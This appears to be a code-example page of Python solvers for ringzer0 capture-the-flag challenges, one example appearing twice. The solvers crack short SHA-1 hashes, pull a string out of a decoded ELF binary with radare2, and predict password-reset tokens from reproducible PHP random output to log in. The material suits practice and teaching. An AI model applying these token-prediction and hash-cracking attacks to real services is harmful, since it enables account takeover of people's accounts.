예제 #1
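def ch56():
    """Solve ringzer0 challenge 56: find the input behind a SHA-1 hash.

    Reads the target hash from the challenge page, searches the digit-only
    candidate space with ``search_hash`` and submits the match.  An unsalted
    hash over a short numeric value gives no protection: the candidate space
    searched here is tiny.

    Returns None.  When no candidate matches, the error is reported and
    nothing is submitted.
    """
    ch, s = 56, ringzer0.login()
    sections = ringzer0.read_challenge(s, ch)
    xhash = sections['hash']

    ringzer0.output('solving')
    charset = '0123456789'
    # NOTE(review): search_hash is defined elsewhere; the two 4s are
    # presumably the minimum and maximum candidate length -- confirm.
    result = search_hash(charset, 4, 4, hashlib.sha1, xhash)
    if result is None:
        ringzer0.error('could not lookup hash ' + xhash)
        # Stop here: the original fell through and submitted None as the
        # answer whenever ringzer0.error() returned to the caller.
        return
    ringzer0.output('solved', result)

    response = ringzer0.submit_challenge(s, ch, result)
    ringzer0.output('response', response)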
예제 #2
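def ch57():
    """Solve ringzer0 challenge 57: find the input behind a salted SHA-1 hash.

    The challenge page supplies both the hash and the salt.  Each digit-only
    candidate has the salt appended before hashing, so the known salt does
    not enlarge the candidate space that has to be searched.

    Returns None.  When no candidate matches, the error is reported and
    nothing is submitted.
    """
    ch, s = 57, ringzer0.login()
    sections = ringzer0.read_challenge(s, ch)
    xhash, xsalt = sections['hash'], sections['salt']

    def append_salt(candidate):
        """Return the candidate with the page's salt appended."""
        return candidate + xsalt

    ringzer0.output('solving')
    charset = '0123456789'
    # NOTE(review): search_hash is defined elsewhere; the two 4s are
    # presumably the minimum and maximum candidate length -- confirm.
    result = search_hash(charset, 4, 4, hashlib.sha1, xhash, append_salt)
    if result is None:
        ringzer0.error('could not lookup hash ' + xhash)
        # Stop here: the original went on to call result.rindex() on None
        # whenever ringzer0.error() returned to the caller.
        return
    # The match apparently comes back in its transformed form (candidate +
    # salt); cut at the last occurrence of the salt to keep the candidate.
    result = result[:result.rindex(xsalt)]
    ringzer0.output('solved', result)

    response = ringzer0.submit_challenge(s, ch, result)
    ringzer0.output('response', response)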
예제 #3
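def ch57():
    """Solve ringzer0 challenge 57: find the input behind a salted SHA-1 hash.

    The challenge page supplies both the hash and the salt.  Each digit-only
    candidate has the salt appended before hashing, so the known salt does
    not enlarge the candidate space that has to be searched.

    Returns None.  When no candidate matches, the error is reported and
    nothing is submitted.
    """
    ch, s = 57, ringzer0.login()
    sections = ringzer0.read_challenge(s, ch)
    xhash, xsalt = sections['hash'], sections['salt']

    def append_salt(candidate):
        """Return the candidate with the page's salt appended."""
        return candidate + xsalt

    ringzer0.output('solving')
    charset = '0123456789'
    # NOTE(review): search_hash is defined elsewhere; the two 4s are
    # presumably the minimum and maximum candidate length -- confirm.
    result = search_hash(charset, 4, 4, hashlib.sha1, xhash, append_salt)
    if result is None:
        ringzer0.error('could not lookup hash ' + xhash)
        # Stop here: the original went on to call result.rindex() on None
        # whenever ringzer0.error() returned to the caller.
        return
    # The match apparently comes back in its transformed form (candidate +
    # salt); cut at the last occurrence of the salt to keep the candidate.
    result = result[:result.rindex(xsalt)]
    ringzer0.output('solved', result)

    response = ringzer0.submit_challenge(s, ch, result)
    ringzer0.output('response', response)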
예제 #4
def ch15():
	"""Solve ringzer0 challenge 15: decode an ELF blob and read a string from main.

	The page's 'elf message' section is base64-decoded repeatedly, byte-reversed
	and checked against the page's MD5 checksum.  The binary is then written to
	a temporary file and opened in radare2 through r2pipe; nothing in this
	function executes it.  The answer is rebuilt from the immediates that
	sym.main stores into rbp-relative stack slots.

	Python 2 code: it relies on str.decode('hex') and on bytearray accepting
	a str argument.
	"""
	ch, s = 15, ringzer0.login()
	sections = ringzer0.read_challenge(s, ch)
	title, msg, chksum = sections['title'], sections['elf message'], sections['checksum']
	
	ringzer0.output('solving')
	elf = msg
	# Keep decoding for as long as the data still looks like base64 text.
	# NOTE(review): the pattern also matches the empty string, so a decode that
	# ever produced '' would keep this loop running -- confirm inputs cannot.
	while re.match(r'^[a-zA-Z0-9+/]*={0,3}$', elf):
		elf = base64.b64decode(elf)
	# The decoded bytes are stored back to front.
	elf = elf[::-1]
	elf_md5 = hashlib.md5(elf).hexdigest()
	# Integrity check against the checksum shown on the page.
	# NOTE(review): unless ringzer0.error() exits, a mismatching blob is still
	# written to disk and analysed below -- confirm.
	if chksum != elf_md5:
		ringzer0.error('checksum mismatch ({0} vs {1})'.format(chksum, elf_md5))
	result = ''
	with ringzer0.tmpfile() as (fd, fn):
		ringzer0.write_bin_file(fd, elf)
		
		# NOTE(review): the r2 handle is never closed in this function.
		r2 = r2pipe.open(fn)
		# Analyse, seek to sym.main and list its instructions; the ~& filter
		# presumably keeps only lines mentioning both 'mov' and 'rbp'.
		asm_lines = r2.cmd('aa; s sym.main; pif~&mov,rbp').splitlines()
		# Captures the hex offset of an [rbp - OFF] destination and the source operand.
		asm_rg = re.compile(r'^mov [^,]*\[rbp\s?-\s?([0-9a-fx]+)\],\s?([^\s]+)$')
		# asm_vals maps stack offset -> stored bytes; top is the largest offset seen.
		asm_vals, top = {}, 0
		for asm_line in asm_lines:
			rx = re.match(asm_rg, asm_line)
			if not rx: 
				continue
			pos, val = rx.group(1), rx.group(2)
			# Skip operands starting with 'r' (presumably register sources).
			if val.startswith('r'): 
				continue
			# Normalise the immediate to an even number of hex digits without prefix.
			if val.startswith('0x'): val = val[2:]
			if len(val) % 2 == 1: val = '0' + val
			pos, val = int(pos, 16), val.decode('hex')
			asm_vals[pos] = val
			top = max(top, pos)
		# NUL-filled buffer, one byte per stack offset up to the largest one.
		stack = bytearray('\0' * top)
		
		# Place each value from the largest offset downwards, bytes reversed
		# (presumably because the immediates are little-endian).
		# NOTE(review): the slice end is len(v), not top - k + len(v); whenever
		# top - k >= len(v) the slice is empty, so the bytes are inserted and
		# the buffer grows instead of being overwritten -- confirm intended.
		for k in sorted(asm_vals, reverse=True):
			v = asm_vals[k]
			stack[top - k:len(v)] = v[::-1]
		# The answer is everything before the first NUL byte.
		result = stack[:stack.index('\00')]
	ringzer0.output('solved', result)
	
	response = ringzer0.submit_challenge(s, ch, result)
	ringzer0.output('response', response)
예제 #5
def ch120():
    """Run the ringzer0 challenge 120 workflow.

    Builds a 16-digit token from ``./php-xrandom`` output, then alternates a
    password reset with a token guess (up to 50 rounds) until the response
    mentions a password, and finally logs in with it.

    Every argument passed to ``./php-xrandom`` is a constant or the loop
    index, so the token does not depend on any secret.  The defensive
    takeaway is that reset tokens must come from a CSPRNG, not from a
    generator whose output can be reproduced.

    Python 2 code (``xrange``; ``check_output`` output handled as ``str``).
    """
    ringzer0.output('creating token')
    digits = []
    for idx in range(16):
        # Argument meaning is defined by ./php-xrandom, which is not shown here.
        raw = check_output(['./php-xrandom', '0', str(idx), '0', '0']).strip()
        for entry in raw.split('\n'):
            kind, value = [part.strip() for part in entry.split(':')]
            if kind == 'linux.rand.64':
                # One decimal digit per run: the value's last digit.
                digits.append(str(int(value) % 10))
                break
    token = ''.join(digits)
    ringzer0.output('token', token)

    ch, s = 120, ringzer0.login()
    ch_url = ringzer0.get_url('/challenges/{0}'.format(int(ch)))

    password = None
    for attempt in xrange(50):
        ringzer0.output('resetting password')
        reset_reply = s.post(ch_url, data={'reset_username': ''})
        response = ringzer0.get_response(reset_reply.text)
        ringzer0.output('reset #{0} => {1}'.format(attempt, response))

        guess_reply = s.get('{0}/?k={1}'.format(ch_url, token))
        response = ringzer0.get_response(guess_reply.text)
        if response.find('password') >= 0:
            password = response
            break
        ringzer0.output('try #{0} => {1}'.format(attempt, response))
        # Wait 1.75 s before the next reset/guess round.
        time.sleep(1.75)

    if password is None:
        ringzer0.error('could not solve.')
        sys.exit(1)

    # The password is the last space-separated word of the response.
    password = password.split(' ')[-1]
    ringzer0.output('solved', password)
    login_reply = s.post(ch_url, data={'username': '******', 'password': password})
    response = ringzer0.get_response(login_reply.text)
    ringzer0.output('response', response)
예제 #6
def ch113():
    """Run the ringzer0 challenge 113 workflow.

    Triggers a password reset, parses the date on the first line of the
    response into a Unix timestamp, and regenerates candidate reset tokens
    by seeding ``./php-xrandom`` with that timestamp and the second before
    it.  Each ``linux.rand.64`` value is tried as the ``k`` parameter until
    the response mentions a password, which is then used to log in.

    The defensive takeaway: a token produced by a time-seeded generator is
    only as secret as the clock value, and here the server prints it.
    """
    ch, s = 113, ringzer0.login()
    ch_url = ringzer0.get_url('/challenges/{0}'.format(int(ch)))

    ringzer0.output('solving')
    ringzer0.output('resetting password')
    reset_reply = s.post(ch_url, data={'reset_username': ''})
    # First response line is parsed as an RFC 2822 style date.
    date_line = ringzer0.get_lines(reset_reply.text)[0]
    ts = mktime_tz(parsedate_tz(date_line))
    # Bounds handed to the generator: the range of 16-digit integers.
    rmin, rmax = 1000000000000000, 9999999999999999

    ringzer0.output('seeding random values')
    password, sec_diff = None, 1
    # Walk the seed from ts - sec_diff up to ts itself.
    for diff in range(sec_diff, -1, -1):
        if password:
            break
        seed = ts - diff
        raw = check_output(['./php-xrandom', str(seed), '0', str(rmin), str(rmax)]).strip()
        for entry in raw.split('\n'):
            kind, value = [part.strip() for part in entry.split(':')]
            if kind != 'linux.rand.64':
                continue
            guess_reply = s.get('{0}/?k={1}'.format(ch_url, value))
            response = ringzer0.get_response(guess_reply.text)
            ringzer0.output('try: {0}s => {1} ({2}) => {3}'.format(-diff, value, kind, response))
            if response.find('password') >= 0:
                password = response
                break

    if password is None:
        ringzer0.error('could not solve.')
        sys.exit(1)

    # The password is the last space-separated word of the response.
    password = password.split(' ')[-1]
    ringzer0.output('solved', password)
    login_reply = s.post(ch_url, data={'username': '******', 'password': password})
    response = ringzer0.get_response(login_reply.text)
    ringzer0.output('response', response)